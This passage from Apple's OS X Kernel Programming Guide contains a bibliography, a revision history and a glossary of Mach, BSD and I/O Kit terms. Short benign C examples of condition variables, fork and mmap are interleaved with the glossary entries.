CMU Computer Science: A 25th Anniversary Commemorative. Richard F. Rashid, Ed. ACM Press, 1991. ISBN 0-201-52899-1.
Load Distribution, Implementation for the Mach Microkernel. Dejan S. Milojicic. Vieweg Verlag, 1994. ISBN 3-528-05424-7.
Programming under Mach. Boykin, et al. Addison-Wesley, 1993. ISBN 0-201-52739-1.
Mach Workshop Proceedings. USENIX Association. October, 1990.
Mach Symposium Proceedings. USENIX Association. November, 1991.
Mach III Symposium Proceedings. USENIX Association. April, 1993. ISBN 1-880446-49-9.

Mach 3 Documentation Series. Open Group Research Institute (RI), now Silicomp:
    Final Draft Specifications OSF/1 1.3 Engineering Release. RI. May, 1993.
    OSF Mach Final Draft Kernel Principles. RI. May, 1993.
    OSF Mach Final Draft Kernel Interfaces. RI. May, 1993.
    OSF Mach Final Draft Server Writer’s Guide. RI. May, 1993.
    OSF Mach Final Draft Server Library Interfaces. RI. May, 1993.

Research Institute Microkernel Series. Open Group Research Institute (RI):
    Operating Systems Collected Papers. Volume I. RI. March, 1993.
    Operating Systems Collected Papers. Volume II. RI. October, 1993.
    Operating Systems Collected Papers. Volume III. RI. April, 1994.
    Operating Systems Collected Papers. Volume IV. RI. October, 1995.

Mach: A New Kernel Foundation for UNIX Development. Proceedings of the Summer 1986 USENIX Conference. Atlanta, GA. http://www.usenix.org.
UNIX as an Application Program. Proceedings of the Summer 1990 USENIX Conference. Anaheim, CA. http://www.usenix.org.

OSF RI papers (Spec ‘93):
    OSF Mach Final Draft Kernel Interfaces
    OSF Mach Final Draft Kernel Principles
    OSF Mach Final Draft Server Library Interfaces
    OSF Mach Final Draft Server Writer's Guide
    OSF Mach Kernel Interface Changes

OSF RI papers (Spec ‘94):
    OSF RI 1994 Mach Kernel Interfaces Draft
    OSF RI 1994 Mach Kernel Interfaces Draft (Part A)
    OSF RI 1994 Mach Kernel Interfaces Draft (Part B)
    OSF RI 1994 Mach Kernel Interfaces Draft (Part C)

OSF RI papers (miscellaneous):
    Debugging an object oriented system using the Mach interface
    Unix File Access and Caching in a Multicomputer Environment
    Untyped MIG: The Protocol
    Untyped MIG: What Has Changed and Migration Guide
    Towards a World-Wide Civilization of Objects
    A Preemptible Mach Kernel
    A Trusted, Scalable, Real-Time Operating System Environment
    Mach Scheduling Framework

Networking

UNIX Network Programming. Volume 1, Networking APIs: Sockets and XTI. W. Richard Stevens. Prentice Hall, 1998. ISBN 0-13-490012-X.
UNIX Network Programming. Volume 2, Interprocess Communications. W. Richard Stevens. Prentice Hall, 1998. ISBN 0-13-081081-9.
TCP/IP Illustrated. Volume 1, The Protocols. W. Richard Stevens. Addison-Wesley, 1994. ISBN 0-201-63346-9.
TCP/IP Illustrated. Volume 2, The Implementation. W. Richard Stevens. Addison-Wesley, 1995. ISBN 0-201-63354-X.
TCP/IP Illustrated. Volume 3, TCP for Transactions, HTTP, NNTP, and the UNIX Domain Protocols. W. Richard Stevens. Addison-Wesley, 1996. ISBN 0-201-63495-3.

Operating Systems

Advanced Computer Architecture: Parallelism, Scalability, Programmability. Kai Hwang. McGraw-Hill, 1993. ISBN 0-07-031622-8.
Concurrent Systems: An Integrated Approach to Operating Systems, Database, and Distributed Systems. Jean Bacon. Addison-Wesley, 1993. ISBN 0-201-41677-8.
Distributed Operating Systems. Andrew S. Tanenbaum. Prentice Hall, 1995. ISBN 0-13-219908-4.
Distributed Operating Systems: The Logical Design. A. Goscinski. Addison-Wesley, 1991. ISBN 0-201-41704-9.
Distributed Systems, Concepts, and Designs. G. Coulouris, et al. Addison-Wesley, 1994. ISBN 0-201-62433-8.
Operating System Concepts. 4th Ed. Abraham Silberschatz, Peter Galvin. Addison-Wesley, 1994. ISBN 0-201-50480-4.

POSIX

Information Technology-Portable Operating System Interface (POSIX): System Application Program Interface (API) (C Language). ANSI/IEEE Std. 1003.1. 1996 Edition. ISO/IEC 9945-1: 1996. IEEE Standards Office. ISBN 1-55937-573-6.
Programming with POSIX Threads. David R. Butenhof. Addison Wesley Longman, Inc., 1997. ISBN 0-201-63392-2.

Programming

Advanced Programming in the UNIX Environment. Richard W. Stevens. Addison-Wesley, 1992. ISBN 0-201-56317-7.
Debugging with GDB: The GNU Source-Level Debugger, Eighth Edition for GDB version 5.0. Richard Stallman et al. Cygnus Support. http://developer.apple.com/documentation/DeveloperTools/gdb/gdb/gdb_toc.html.
Open Source Development with CVS. Karl Franz Fogel. Coriolis Group, 1999. ISBN 1-57610-490-7.
Porting UNIX Software: From Download to Debug. Greg Lehey. O’Reilly, 1995. ISBN 1-56592-126-7.
The Standard C Library. P.J. Plauger. Prentice Hall, 1992. ISBN 0-13-131509-9.

Websites and Online Resources

Apple’s developer website (http://www.apple.com/developer/) is a general repository for developer documentation. Additionally, the following sites provide more domain-specific information.
Apple's Public Source projects and Darwin
http://www.opensource.apple.com/

The Berkeley Software Distribution (BSD)
http://www.FreeBSD.org
http://www.NetBSD.org
http://www.OpenBSD.org

BSD Networking
http://www.kohala.com/start/

Embedded C++
http://www.caravan.net/ec2plus

GDB, GNUPro Toolkit 99r1 Documentation
http://www.redhat.com/docs/manuals/gnupro/

The Internet Engineering Task Force (IETF)
http://www.ietf.org

jam
http://www.perforce.com/jam/jam.html

The PowerPC CPU
http://www.freescale.com/webapp/sps/site/homepage.jsp?nodeId=0162468rH3bTdG

The Single UNIX Specification Version 2
http://www.opengroup.org/onlinepubs/007908799

The USENIX Association; USENIX Proceedings
http://www.usenix.org
http://www.usenix.org/publications/library/

Security and Cryptography

Applied Cryptography: Protocols, Algorithms, and Source Code in C. Bruce Schneier. John Wiley & Sons, 1994. ISBN 0-471-59756-2.
comp.security newsgroup (news:comp.security).
comp.security.unix newsgroup (news:comp.security.unix).
Computer Security. Dieter Gollmann. John Wiley and Sons Ltd, 1999. ISBN 0-471-97844-2.
Foundations of Cryptography. Oded Goldreich. Cambridge University Press, 2001. ISBN 0-521-79172-3.
Secrets and Lies: Digital Security in a Networked World. Bruce Schneier. John Wiley & Sons, 2000. ISBN 0-471-25311-1.

Document Revision History

This table describes the changes to Kernel Programming Guide.

Date        Notes
2012-02-16  Updated for OS X v10.7.
2011-03-08  Added a chapter that discusses the early stages of the boot process. "The Early Boot Process" (page 21) was formerly part of Daemons and Services Programming Guide, and was moved here during a reorganization of that book.
2006-11-07  Added security information and improved kernel build instructions.
2006-10-03  Made minor corrections.
2006-05-23  Added a note about pmuflags to the debugging section.
2006-04-04  Removed out-of-date information for OS X v10.4.
2006-03-08  Updated some stale content for OS X version 10.4.
2006-01-10  Corrected locking prototypes. Made minor fixes to the file system section.
2005-11-09  Revised networking, synchronization, and kernel services APIs for OS X v10.4.
2005-08-11  Changed terminology from "fat binary" to "universal binary." Clarified the distinction between memory objects and VM objects.
2005-07-07  Fixed minor errors in build instructions.
2005-06-04  Updated kernel build instructions for OS X v10.4; other minor fixes.
2005-04-29  Added information about generating NMI on newer hardware in OS X v10.4 and later; various other minor changes.
2005-02-03  Made minor corrections.
2004-12-02  Made section number fix to man page reference in Chapter 14.
2004-11-01  Minor wording changes.
2004-08-01  Added details comparing current_task to mach_task_self. Added information about using AltiVec and floating point in the kernel.
2003-09-01  Minor corrections to kernel build information.
2003-08-01  Added information relating to Power Macintosh G5 VM issues and debugging. Clarified wait queue documentation (event_t).
2003-02-01  Minor update release. Added index and tweaked wording throughout. Fixed minor errata in debugging chapter. Added a few missing details in the security chapter and cleaned up the equations presented. Corrected a few very minor OS X v10.2-specific details that weren't caught during the first revision.
2002-08-01  OS X v10.2 update release. Changed information on KEXT management, various small corrections (mainly wording improvements).
2002-06-01  Full web release to coincide with WWDC. Corrected a few minor errata from the previous release.
2002-01-01  Initial partial web release.

Glossary

abstraction (v) The process of separating the interface to some functionality from the underlying implementation in such a way that the implementation can be changed without changing the way that piece of code is used. (n) The API (interface) for some piece of functionality that has been separated in this way.
address space The virtual address ranges available to a given task (note: the task may be the kernel). In OS X, processes do not share the same address space. The address spaces of multiple processes can, however, point to the same physical address ranges. This is referred to as shared memory.
anonymous memory Virtual memory backed by the default pager to swap files, rather than by a persistent object. Anonymous memory is zero-initialized and exists only for the life of the task. See also default pager; task.
API (application programming interface) The interface (calling convention) by which an application program accesses a service. This service may be provided by the operating system, by libraries, or by other parts of the application.
Apple Public Source License Apple's Open Source license, available at http://www.apple.com/publicsource. Darwin is distributed under this license. See also Open Source.
AppleTalk A suite of network protocols that is standard on Macintosh computers.
ASCII (American Standard Code for Information Interchange) A 7-bit character set (commonly represented using 8 bits) that defines 128 unique character codes. See also Unicode.
BSD (Berkeley Software Distribution) Formerly known as the Berkeley version of UNIX, BSD is now simply called the BSD operating system. The BSD portion of the OS X kernel is based on FreeBSD, a version of BSD.
bundle A directory that stores executable code and the software resources related to that code. Applications, plug-ins, and frameworks represent types of bundles. Except for frameworks, bundles are presented by the Finder as if they were a single file.
Carbon An application environment in OS X that features a set of programming interfaces derived from earlier versions of the Mac OS. The Carbon APIs have been modified to work properly with OS X. Carbon applications can run in OS X, Mac OS 9, and all versions of Mac OS 8 later than Mac OS 8.1 (with appropriate libraries).
Classic An application environment in OS X that lets users run non-Carbon legacy Mac OS software. It supports programs built for both PowerPC and 68K processor architectures.
clock An object used to abstract time in Mach.
Cocoa An advanced object-oriented development platform on OS X. Cocoa is a set of frameworks with programming interfaces in both Java and Objective-C. It is based on the integration of OPENSTEP, Apple technologies, and Java.
condition variable Essentially a wait queue with additional locking semantics. When a thread sleeps waiting for some event to occur, it releases a related lock so that another thread can cause that event to occur. When the second thread posts the event, the first thread wakes up, and, depending on the condition variable semantics used, either takes the lock immediately or begins waiting for the lock to become available.
console (1) A text-based login environment that also displays system log messages, kernel panics, and other information. (2) A special window in OS X that displays messages that would be printed to the text console if the GUI were not in use. This window also displays output written to the standard error and standard output streams by applications launched from the Finder. (3) An application by the same name that displays the console window.
control port In Mach, access to the control port allows an object to be manipulated. Also called the privileged port. See also port; name port.
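The condition variable entry above describes one thread sleeping on an event while releasing a related lock so that a second thread can post the event. As a rough user-space illustration only, the following sketch uses the POSIX threads API rather than any in-kernel wait queue interface. The names handoff, poster, and wait_for_event are hypothetical and chosen for this example; they do not appear in the guide.

```c
#include <assert.h>
#include <pthread.h>
#include <stdbool.h>

/* Hypothetical shared state for illustration; not part of any Apple API. */
struct handoff {
    pthread_mutex_t lock;    /* the "related lock" from the glossary entry */
    pthread_cond_t  posted;  /* the condition variable */
    bool            ready;   /* the event the first thread waits for */
    int             value;
};

/* Second thread: takes the lock, causes the event, and posts it. */
static void *poster(void *arg)
{
    struct handoff *h = arg;

    pthread_mutex_lock(&h->lock);
    h->value = 42;
    h->ready = true;
    pthread_cond_signal(&h->posted);
    pthread_mutex_unlock(&h->lock);
    return NULL;
}

/* First thread: sleeps until the event is posted, then returns the value.
 * Returns -1 if the second thread could not be created. */
int wait_for_event(void)
{
    struct handoff h = { .ready = false, .value = 0 };
    pthread_t thread;
    int result;

    pthread_mutex_init(&h.lock, NULL);
    pthread_cond_init(&h.posted, NULL);

    pthread_mutex_lock(&h.lock);
    if (pthread_create(&thread, NULL, poster, &h) != 0) {
        pthread_mutex_unlock(&h.lock);
        pthread_cond_destroy(&h.posted);
        pthread_mutex_destroy(&h.lock);
        return -1;
    }

    /* pthread_cond_wait releases the lock while sleeping and reacquires
     * it before returning; the loop guards against spurious wakeups. */
    while (!h.ready)
        pthread_cond_wait(&h.posted, &h.lock);
    result = h.value;
    pthread_mutex_unlock(&h.lock);

    pthread_join(thread, NULL);
    pthread_cond_destroy(&h.posted);
    pthread_mutex_destroy(&h.lock);
    return result;
}
```

Calling wait_for_event() from a program's main function is enough to exercise the handoff. With POSIX semantics the waiting thread reacquires the lock before pthread_cond_wait returns, which corresponds to one of the two wake-up behaviors the entry mentions.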
cooperative multitasking A multitasking environment in which a running program can receive processing time only if other programs allow it; each application must give up control of the processor cooperatively in order to allow others to run. Mac OS 9 is a cooperative multitasking environment. See also preemptive multitasking.
copy-on-write A delayed copy optimization used in Mach. The object to be copied is marked temporarily read-only. When a thread attempts to write to any page in that object, a trap occurs, and the kernel copies only the page or pages that are actually being modified. See also thread.
daemon A long-lived process, usually without a visible user interface, that performs a system-related service. Daemons are usually spawned automatically by the system and may either live forever or be regenerated at intervals. They may also be spawned by other daemons.
Darwin The core of OS X, Darwin is an Open Source project that includes the Darwin kernel, the BSD commands and C libraries, and several additional features. The Darwin kernel is synonymous with the OS X kernel.
default pager In Mach, one of the built-in pagers. The default pager handles nonpersistent (anonymous) memory. See also anonymous memory; vnode pager; pager.
demand paging An operating-system facility that brings pages of data from disk into physical memory only as they are needed.
DLIL (Data Link Interface Layer) The part of the OS X kernel's networking infrastructure that provides the interface between protocol handling and network device drivers in the I/O Kit. A generalization of the BSD "ifnet" architecture.
DMA (direct memory access) A means of transferring data between host memory and a peripheral device without requiring the host processor to move the data itself. This reduces processor overhead for I/O operations and may reduce contention on the processor bus.
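The copy-on-write entry above describes a kernel-internal optimization that user code cannot observe directly. What can be observed is the result it has to preserve: after fork(2), a write in the child must not show up in the parent. The sketch below checks only that visible behavior and assumes a POSIX system. Whether a given kernel actually defers the copy is an implementation detail that this code does not verify, and the function name parent_unaffected_by_child_write is hypothetical.

```c
#define _POSIX_C_SOURCE 200809L
#include <assert.h>
#include <string.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* Returns 0 if the parent's buffer is unchanged after the child writes
 * to its own copy, 1 if it changed, and -1 on error. */
int parent_unaffected_by_child_write(void)
{
    static char page[4096];
    int status;
    pid_t pid;

    memset(page, 'A', sizeof page);

    pid = fork();
    if (pid < 0)
        return -1;

    if (pid == 0) {
        /* Child: this write goes to the child's copy of the page. */
        page[0] = 'B';
        _exit(page[0] == 'B' ? 0 : 1);
    }

    /* Parent: wait for the child, then inspect our own copy. */
    if (waitpid(pid, &status, 0) < 0)
        return -1;
    if (!WIFEXITED(status) || WEXITSTATUS(status) != 0)
        return -1;

    return page[0] == 'A' ? 0 : 1;
}
```

A return value of 0 means the parent's page kept its original contents, which is the guarantee a copy-on-write implementation must maintain while avoiding an eager copy of every page.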
driver Software that deals with getting data to and from a device, as well as control of that device. In the I/O Kit, an object that manages a piece of hardware (a device), implementing the appropriate I/O Kit abstractions for that device. See also object.
DVD (Digital Versatile Disc) Originally, Digital Video Disc. An optical storage medium that provides greater capacity and bandwidth than CD-ROM; DVDs are frequently used for multimedia as well as data storage.
dyld (dynamic link editor) A utility that allows programs to dynamically load (and link to) needed functions.
EMMI (External Memory Management Interface) Mach's interface to memory objects that allows their contents to be contributed by user-mode tasks. See also external pager.
Ethernet A family of high-speed local area network technologies in common use. Some common variants include 802.3 and 802.11 (AirPort).
exception An interruption to the normal flow of program control, caused by the program itself or by executing an illegal instruction.
exception port A Mach port on which a task or thread receives messages when exceptions occur.
external pager A module that manages the relationship between virtual memory and a backing store. External pagers are clients of Mach's EMMI. The pager API is currently not exported to user space. The built-in pagers in OS X are the default pager, the device pager, and the vnode pager. See also EMMI (External Memory Management Interface).
family In the I/O Kit, a family defines a collection of software abstractions that are common to all devices of a particular category (for example, PCI, storage, USB). Families provide functionality and services to drivers. See also driver.
FAT (file allocation table) A data structure used in the MS-DOS file system. Also synonymous with the file system that uses it. The FAT file system is also used as part of Microsoft Windows and has been adopted for use inside devices such as digital cameras.
fat files See universal binaries.
FIFO (first-in first-out) A data processing scheme in which data is read in the order in which it was written, processes are run in the order in which they were scheduled, and so forth.
file descriptor A per-process unique, nonnegative integer used to identify an open file (or socket).
firewall Software (or a computer running such software) that prevents unauthorized access to a network by users outside of the network.
fixed-priority policy In Mach, a scheduling policy in which threads execute for a certain quantum of time, and then are put at the end of the queue of threads of equal priority.
fork (1) A stream of data that can be opened and accessed individually under a common filename. The Macintosh Standard and Extended file systems store a separate "data" fork and a "resource" fork as part of every file; data in each fork can be accessed and manipulated independently of the other. (2) In BSD, fork is a system call that creates a new process.
framework A bundle containing a dynamic shared library and associated resources, including image files, header files, and documentation. Frameworks are often used to provide an abstraction for manipulating device driver families from applications.
FreeBSD A variant of the BSD operating system. See http://www.freebsd.org for details.
gdb (GNU debugger) gdb is a powerful, source-level debugger with a command-line interface. gdb is a popular Open Source debugger and is included with the OS X developer tools.
HFS (hierarchical file system) The Mac OS Standard file system format, used to represent a collection of files as a hierarchy of directories (folders), each of which may contain either files or folders themselves.
HFS+ The Mac OS Extended file system format. This file system format was introduced as part of Mac OS 8.1, adding support for filenames longer than 31 characters, Unicode representation of file and directory names, and efficient operation on larger disks.
host (1) The computer that is running (is host to) a particular program or service. The term is usually used to refer to a computer on a network. (2) In debugging, the computer that is running the debugger itself. In this context, the target is the machine running the application, kernel, or driver being debugged.
host processor The microprocessor on which an application program resides. When an application is running, the host processor may call other, peripheral microprocessors, such as a digital signal processor, to perform specialized operations.
IDE (integrated development environment) An application or set of tools that allows a programmer to write, compile, edit, and in some cases test and debug within an integrated, interactive environment.
inheritance attribute In Mach, a value indicating the degree to which a parent process and its child process share pages in the parent process's address space. A memory page can be inherited as copy-on-write, shared, or not at all.
in-line data Data that's included directly in a Mach message, rather than referred to by a pointer. See also out-of-line data.
info plist See information property list.
information property list A special form of property list with predefined keys for specifying basic bundle attributes and information of interest, such as supported document types and offered services. See also bundle; property list.
interrupt service thread A thread running in kernel space for handling I/O that is triggered by an interrupt, but does not run in an interrupt context. Also called an I/O service thread.
I/O (input/output) The exchange of data between two parts of a computer system, usually between system memory and a peripheral device.
I/O Kit Apple's object-oriented I/O development model. The I/O Kit provides a framework for simplified driver development, supporting many families of devices. See also family.
I/O service thread See interrupt service thread.
IPC (interprocess communication) The transfer of information between processes or between the kernel and a process.
IPL (interrupt priority level) A means of basic synchronization on uniprocessor systems in traditional BSD systems, set using the spl macro. Interrupts with lower priority than the current IPL will not be acted upon until the IPL is lowered. In many parts of the kernel, changing the IPL in OS X is not useful as a means of synchronization. New use of spl macros is discouraged. See also spl (set priority level).
KDP The kernel shim used for communication with a remote debugger (gdb).
Kerberos An authentication system based on symmetric key cryptography. Used in MIT Project Athena and adopted by the Open Software Foundation (OSF).
kernel The complete OS X core operating-system environment that includes Mach, BSD, the I/O Kit, file systems, and networking components.
kernel crash An unrecoverable system failure in the kernel caused by an illegal instruction, memory access exception, or other failure rather than explicitly triggered as in a panic. See also panic.
kernel extension See KEXT (kernel extension).
kernel mode See supervisor mode.
kernel panic See panic.
kernel port A Mach port whose receive right is held by the kernel. See also task port; thread port.
KEXT (kernel extension) A bundle that extends the functionality of the kernel. The I/O Kit, File system, and Networking components are designed to allow and expect the creation and use of KEXTs.
KEXT binary A file (or files) in Mach-O format, containing the actual binary code of a KEXT. A KEXT binary is the minimum unit of code that can be loaded into the kernel. Also called a kernel module or KMOD. See also KEXT (kernel extension); Mach-O.
key signing In public key cryptography, to (electronically) state your trust that a public key really belongs to the person who claims to own it, and potentially that the person who claims to own it really is who he or she claims to be.
KMOD (kernel module) See KEXT binary.
lock A basic means of synchronizing multiple threads. Generally only one thread can "hold" a lock at any given time. While a thread is holding the lock, any other thread that tries to take it will wait, either by blocking or by spinning, depending on the nature of the lock. Some lock variants such as read-write locks allow multiple threads to hold a single lock under certain conditions.
Mach The lowest level of the OS X kernel. Mach provides such basic services and abstractions as threads, tasks, ports, IPC, scheduling, physical and virtual address space management, VM, and timers.
Mach-O Mach object file format. The preferred object file format for OS X.
Mach server A task that provides services to clients, using a MIG-generated RPC interface. See also MIG (Mach interface generator).
main thread By default, a process has one thread, the main thread. If a process has multiple threads, the main thread is the first thread in the process. A user process can use the POSIX thread API to create other user threads.
makefile A makefile details the files, dependencies, and rules by which an executable application is built.
memory-mapped files A facility that maps virtual memory onto a physical file. Thereafter, any access to that part of virtual memory causes the corresponding page of the physical file to be accessed. The contents of the file can be changed by changing the contents in memory.
memory object An object managed by a pager that represents the memory, file, or other storage that backs a VM object. See also pager.
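The memory-mapped files entry above states that a file's contents can be changed by changing the mapped memory. The following user-space sketch shows one way to see that with the POSIX mmap interface. The temporary path template and the function name change_file_through_mapping are assumptions made for this example; nothing here is taken from the guide's own code.

```c
#define _XOPEN_SOURCE 700
#include <assert.h>
#include <fcntl.h>
#include <stdlib.h>
#include <string.h>
#include <sys/mman.h>
#include <unistd.h>

/* Writes "hello" to a temporary file, maps the file, changes the first
 * byte through the mapping, and reads the file back with pread().
 * Returns the first byte of the file as read back, or -1 on error. */
int change_file_through_mapping(void)
{
    char path[] = "/tmp/mmap_demo_XXXXXX";  /* hypothetical temp file name */
    char check = 0;
    char *map;
    int result = -1;
    int fd = mkstemp(path);

    if (fd < 0)
        return -1;
    unlink(path);  /* the file is removed once fd is closed */

    if (write(fd, "hello", 5) != 5)
        goto out;

    /* MAP_SHARED makes stores to the mapping reach the file itself. */
    map = mmap(NULL, 5, PROT_READ | PROT_WRITE, MAP_SHARED, fd, 0);
    if (map == MAP_FAILED)
        goto out;

    map[0] = 'J';  /* change the file by changing memory */

    if (msync(map, 5, MS_SYNC) == 0 && pread(fd, &check, 1, 0) == 1)
        result = check;

    munmap(map, 5);
out:
    close(fd);
    return result;
}
```

The function returns 'J' when the store through the mapping is visible to an ordinary read of the file. With MAP_PRIVATE instead of MAP_SHARED the store would stay in a private copy of the page and the file would still begin with 'h'.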
memory protection A system of memory management in which programs are prevented from being able to modify or corrupt the memory partition of another program, usually through the use of separate address spaces.
message A unit of data sent by one task or thread that is guaranteed to be delivered atomically to another task or thread. In Mach, a message consists of a header and a variable-length body. Some system services are invoked by passing a message from a thread to the Mach port representing the task that provides the desired service.
microkernel A kernel implementing a minimal set of abstractions. Typically, higher-level OS services such as file systems and device drivers are implemented in layers above a microkernel, possibly in trusted user-mode servers. OS X is a hybrid between microkernel and monolithic kernel architectures. See also monolithic kernel.
MIG (Mach interface generator) (1) A family of software that generates and supports the use of a procedure call interface to Mach's system of interprocess communication. (2) The interface description language supported by MIG.
monolithic kernel A kernel architecture in which all pieces of the kernel are closely intertwined. A monolithic kernel provides substantial performance improvements. It is difficult to evolve the individual components independently, however. The OS X kernel is a hybrid of the monolithic and microkernel models. See also microkernel.
multicast A process in which a single packet can be addressed to multiple recipients. Multicast is used, for example, in streaming video, in which many megabytes of data are sent over the network.
multihoming The ability to have multiple network addresses in one computer, usually on different networks. For example, multihoming might be used to create a system in which one address is used to talk to hosts outside a firewall and the other to talk to hosts inside; the computer provides facilities for passing information between the two.
multitasking The concurrent execution of multiple programs. OS X uses preemptive multitasking. Mac OS 9 uses cooperative multitasking.
mutex See mutex lock (mutual exclusion lock).
mutex lock (mutual exclusion lock) A type of lock characterized by putting waiting threads to sleep until the lock is available.
named (memory) entry A handle (a port) to a mappable object backed by a memory manager. The object can be a region or a memory object.
name port In Mach, access to the name port allows non-privileged operations against an object (for example, obtaining information about the object). In effect, it provides a name for the object without providing any significant access to the object. See also port; control port.
named region In Mach, a form of named memory entry that provides a form of memory sharing.
namespace An agreed-upon context in which names (identifiers) can be defined. Within a given namespace, all names must be unique.
NAT (network address translation) A scheme that transforms network packets at a gateway so network addresses that are valid on one side of the gateway are translated into addresses that are valid on the other side.
network A group of hosts that can communicate with each other.
NFS (network file system) A commonly used file server protocol often found in UNIX and UNIX-based environments.
NKE (network kernel extension) A type of KEXT that provides a way to extend and modify the networking infrastructure of OS X dynamically without recompiling or relinking the kernel.
NMI (nonmaskable interrupt) An interrupt produced by a particular keyboard sequence or button that cannot be blocked in software. It can be used to interrupt a hung system, for example to drop into a debugger.
nonsimple message In Mach, a message that contains either a reference to a port or a pointer to data. See also simple message.
notify port A special Mach port that is part of a task. A task's notify port receives messages from the kernel advising the task of changes in port access rights and of the status of messages it has sent.
nub An I/O Kit object that represents a point of connection for a device or logical service. Each nub provides access to the device or service it represents, and provides such services as matching, arbitration, and power management. It is most common that a driver publishes one nub for each individual device or service it controls; it is possible for a driver that vends only a single device or service to act as its own nub.
NVRAM (nonvolatile RAM) RAM storage that retains its state even when the power is off. See also RAM (random-access memory).
object (1) A collection of data. (2) In Mach, a collection of data, with permissions and ownership. (3) In object-oriented programming, an instance of a class.
OHCI (Open Host Controller Interface) The register-level standards that are used by most USB and FireWire controller chips.
Open Source Software that includes freely available access to source code, redistribution, modification, and derived works. The full definition is available at http://www.opensource.org.
Open Transport A communications architecture for implementing network protocols and other communication features on computers running classic Mac OS. Open Transport provides a set of programming interfaces that supports, among other things, both the AppleTalk and TCP/IP protocols.
out-of-line data Data that's passed by reference in a Mach message, rather than being included in the message. See also in-line data.
packet An individual piece of information sent on a network.
page (n) (1) The largest block of virtual address space for which the underlying physical address space is guaranteed contiguous; in other words, the unit of mapping between virtual and physical addresses. (2) logical page size: The minimum unit of information that an anonymous pager transfers between system memory and the backing store. (3) physical page size: The unit of information treated as a unit by a hardware MMU. The logical page size must be at least as large as the physical page size for hardware-based memory protection to be possible. (v) To move data between memory and a backing store.
pager A module responsible for providing the data for the pages of a memory object. See also default pager; vnode pager.
panic An unrecoverable system failure explicitly triggered by the kernel with a call to panic. See also kernel crash.
PEF (Preferred Executable Format) The format of executable files used for applications and shared libraries in Mac OS 9; supported in OS X. The preferred format for OS X is Mach-O.
physical address An address to which a hardware device, such as a memory chip, can directly respond. Programs, including the Mach kernel, use virtual addresses that are translated to physical addresses by mapping hardware controlled by the Mach kernel.
pmap Part of Mach VM that provides an abstract way to set and fetch virtual to physical mappings from hardware. The pmap system is the machine-dependent layer of the VM system.
port In Mach, a secure unidirectional channel for communication between tasks running on a single system. In IP transport protocols, an integer identifier used to select a receiving service for an incoming packet, or to specify the sender of an outgoing packet.
port name In Mach, an integer index into a port namespace; a port right is specified with respect to its port name. See also port rights.
port rights In Mach, the ability to send to or receive from a Mach port. Also known as port access rights.
port set In Mach, a set of zero or more Mach ports. A thread can receive messages sent to any of the ports contained in a port set by specifying the port set as a parameter to msg_receive().
POSIX (Portable Operating System Interface) A standard that defines a set of operating-system services. It is supported by ISO/IEC, IEEE, and The Open Group.
preemption The act of interrupting a currently running program in order to give time to another task.
preemptive multitasking A type of multitasking in which the operating system can interrupt a currently running task in order to run another task, as needed. See also cooperative multitasking.
priority In scheduling, a number that indicates how likely a thread is to run. The higher the thread's priority, the more likely the thread is to run. See also scheduling policy.
process A BSD abstraction for a running program. A process's resources include an address space, threads, and file descriptors. In OS X, a process is based on one Mach task and one or more Mach threads.
process identifier (PID) A number that uniquely identifies a process. Also called a process ID.
programmed I/O I/O in which the CPU accomplishes data transfer with explicit load and store instructions to device registers, rather than DMA, and without the use of interrupts. This data transfer is often done in a byte-by-byte, or word-by-word fashion. Also known as direct or polled I/O. See also DMA (direct memory access).
property list A textual way to represent data. Elements of the property list represent data of certain types, such as arrays, dictionaries, and strings. System routines allow programs to read property lists into memory and convert the textual data representation into "real" data. See also information property list.
protected memory See memory protection.
protocol handler A network module that extracts data from input packets (giving the data to interested programs) and inserts data into output packets (giving the output packet to the appropriate network device driver).
pthreads The POSIX threads implementation. See also POSIX (Portable Operating System Interface); thread.
quantum The fixed amount of time a thread or process can run before being preempted.
RAM (random-access memory) Memory that a microprocessor can either read from or write to. real-time performance Performance characterized by guaranteed worst-case response times. Real-time support is important for applications such as multimedia. receive rights In Mach, the ability to receive messages on a Mach port. Only one task at a time can have receive rights for any one port. See also send rights. remote procedure call See RPC (remote procedure call). reply port A Mach port associated with a thread that is used in remote procedure calls. ROM (read-only memory) Memory that cannot be written to. root (1) An administrative account with special privileges. For example, only the root account can load kernel extensions.(2) In graph theory, the base of a tree. (3) root directory: The base of a file system tree. (4) root file system: The primary file system off which a computer boots, so named because it includes the root node of the file system tree. routine In Mach, a remote procedure call that returns a value. This can be used for synchronous or asynchronous operations. See also simpleroutine. RPC (remote procedure call) An interface to IPC that appears (to the caller) as an ordinary function call. In Mach, RPCs are implemented using MIG-generated interface libraries and Mach messages. scheduling The determination of when each process or task runs, including assignment of start times. scheduling policy In Mach, how the thread’s priority isset and under what circumstancesthe thread runs. See also priority. SCSI (Small Computer Systems Interface) A standard communications protocol used for connecting devicessuch as disk drivesto computers. Also, a family of physical bus designs and connectors commonly used to carry SCSI communication. semaphore Similar to a lock, except that a finite number of threads can be holding a semaphore at the same time. See also lock. send rights In Mach, the ability to send messages to a Mach port. 
Many tasks can have send rights for the same port. See also receive rights. session key In cryptography, a temporary key that is only used for one message, one connection session, orsimilar. Session keys are generally treated asshared secrets, and are frequently exchanged over a channel encrypted using public key cryptography. Glossary 2012-02-16 | © 2002, 2012 Apple Inc. All Rights Reserved. 192shadow object In Mach VM, a memory object that holds modified pages that originally belonged to another memory object. Thisis used when an object that was duplicated in a copy-on-write fashion is modified. If a page is not found in this shadow object, the original object is referenced. simple message In Mach, a message that contains neither references to ports nor pointers to data. See also nonsimple message. simpleroutine In Mach, a remote procedure call that does not return a value, and has no out or inout parameters. This can be used for asynchronous operations. See also routine. SMP (symmetric multiprocessing) A system architecture in which two or more processors are managed by one kernel, share the same memory, have equal access to I/O devices, and in which any task, including kernel tasks, can run on any processor. spinlock Any of a family of lock types characterized by continuously polling to see if a lock is available, rather than putting the waiting thread to sleep. spin/sleep lock Any of a family of lock types characterized by some combination of the behaviors of spinlocks and mutex (sleep) locks. spl (set priority level) A macro thatsetsthe current IPL. Interrupts with lower priority than the current IPL will not be acted upon until the IPL is lowered. The spl macros have no effect in many parts of OS X, so their use is discouraged as a means of synchronization in new programming except when modifying code that already uses spl macros. See also IPL (interrupt priority level). socket (1) In a user process, a file descriptor that has been allocated using socket(2). 
(2) In the kernel, the data structure allocated when the kernel’s implementation of the socket(2) call is made. (3) In AppleTalk protocols, a socket serves the same purpose as a port in IP transport protocols.

submap A collection of mappings in the VM system that is shared among multiple Mach tasks.

supervisor mode Also known as kernel mode, the processor mode in which certain privileged instructions can be executed, including those related to page table management, cache management, clock setting, and so on.

